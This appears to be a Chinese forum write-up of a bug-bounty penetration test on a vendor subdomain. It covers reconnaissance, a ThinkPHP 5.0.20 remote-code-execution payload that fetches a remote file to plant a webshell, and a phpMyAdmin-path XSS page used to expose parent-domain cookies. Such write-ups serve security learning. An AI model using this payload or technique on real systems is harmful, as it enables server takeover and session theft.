前言

之前在先知社区和freebuf上看过关于子域名劫持的文章,一直觉得这种漏洞挺有意思,
但是总感觉很难撞到能真正利用起来的,后来有幸目睹了Art3mis师傅进行了一次风骚的子域名劫持,

让我看到了实时案例,于是希望着有一天我也能挖个这种洞。

正文

子域名挖掘

在挖某厂商的SRC时,我用了农夫安全的farmscan_domain对他进行了子域名挖掘,

发现了一个子域名为xxxxxx.x.com

访问他发现了

然后我意识到了这里有搞头

信息收集

反解析ip 发现他是腾讯云下的服务器

用nmap扫描端口 发现他开放了22 80 888 8888端口

然后直接访问ip时 返回了一个json数据

{"code":0,"msg":"欢迎访问","data":[]}

有个扫出一个后台ip/Admin/login/index.html 这里的验证码不会刷新可进行爆破 经过一番尝试爆破不出密码

访问888端口 回响403

访问8888端口

我只能得到这些信息

这个腾讯云的服务器 用了宝塔面板 宝塔的后台地址我无法得知 有个可爆破的后台

在爆破了后台跟ssh无果之后我几乎放弃

然后我决定再对其进行一次目录爆破

RCE

然后我突然想访问一下这个目录看看他会报什么错xxxx/%3f/

于是最大的转机来了,报错了,最重要的是发现了这个

ThinkPHP V5.0.20 { 十年磨一剑-为API开发设计的高性能框架 }

下意识就想到了thinkphp的漏洞,

虽然看过了水泡泡师傅和chybeta师傅在先知上关于这个漏洞的文章,

但是因为各种原因没有好好复现过这个漏洞在后面插payload的过程中踩了很多坑,

进过多次尝试,终于成功的getshell了

poc

http://xxxx/index.php?s=captcha&lego=copy("http://xxx/lego.txt","test.php")

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=lego

蚁剑连上去

发现了一个hydra.php的文件,发现被人种过马了,

顺手把这个马删了。

在拿下这个域名的webshell之后,我想对这种漏洞进行一个利用

在这子域名下

携带了一些 *.xxx.com的cookie

于是我便想着上传一个xss页面

利用

直接用域名访问xxxxx/test.php 返回404

ip/test.php 会访问到我的一句话

只有在访问域名的时候浏览器才会携带cookie,用ip访问时浏览器不会携带cookie

意味着,我即使上传了带XSS的html页面,也无法访问到XSS页面。

但是我用域名:8888访问可以访问到宝塔那个页面

我起初想要修改那个页面来实现XSS

如果我们想要修改宝塔的话,就要访问/www/server/panel/ 目录,

但是我的webshell是没有权限访问那个目录了,除非提权,

但是这又是一台腾讯云的服务器,应该不会出现可以提权的漏洞,

于是我陷入了沉思。。。。。

然后沉思久了我就去WC了,在WC的过程中,我用手机看了一下宝塔官网的用户手册 http://docs.bt.cn/424204

在翻阅之后,我发现了一些有趣的东西,比如我们之前直接用域名访问,发现有那个没找到站点的页面,

其实这个是因为宝塔面板里面没有设置这个域名为解析的域名,所以会出现这种情况。

然后我们需要/etc/init.d/bt default才能查看宝塔的后台地址,我用蚁剑发现无法执行命令,估计是权限不够,

所以修改8888端口下的宝塔估计也是凉凉了

在继续翻阅宝塔的用户手册后,我发现了端口888运行了是phpmyadmin,然后我突然感觉到了我应该是可以完成这次利用了,

我找到了phpmyadmin的绝对路径

phpmyadmin_xxxxxxxxx

我们之前直接访问888端口返回的是

当我访问

xxx.com/phpmyadmin_xxxxxxxxx/

成功的跳转到了phpmyadmin的后台

在这个目录下新建一个html页面,访问

子域名:888/phpmyadmin_xxxxxxxxx/test.html

成功弹出cookie

至此,我的利用已经完成了。

总结

这次渗透不得不说,有很多的运气成分,主要时间在于信息收集上和学习新的事物上,
第一次挖子域名劫持,第一次认真利用thinkphp的RCE,和第一次真正的接触宝塔面板,
整个过程磕磕绊绊,收获了很多。

点击收藏 | 0 关注 | 1
登录 后跟帖